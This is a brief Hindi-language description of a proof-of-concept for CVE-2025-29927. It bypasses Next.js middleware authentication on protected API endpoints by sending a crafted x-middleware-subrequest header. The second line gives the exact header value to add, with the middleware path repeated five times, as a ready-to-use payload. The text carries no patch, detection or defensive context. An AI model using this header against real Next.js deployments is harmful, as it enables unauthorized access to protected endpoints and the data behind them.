
CVE-2025-29927 के लिए प्रूफ-ऑफ-कॉन्सेप्ट जो संरक्षित API एंडपॉइंट्स पर क्राफ्टेड x-middleware-subrequest हेडर भेजकर Next.js मिडलवेयर प्रमाणीकरण को बायपास करता है।
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware को हेडर के रूप में जोड़ें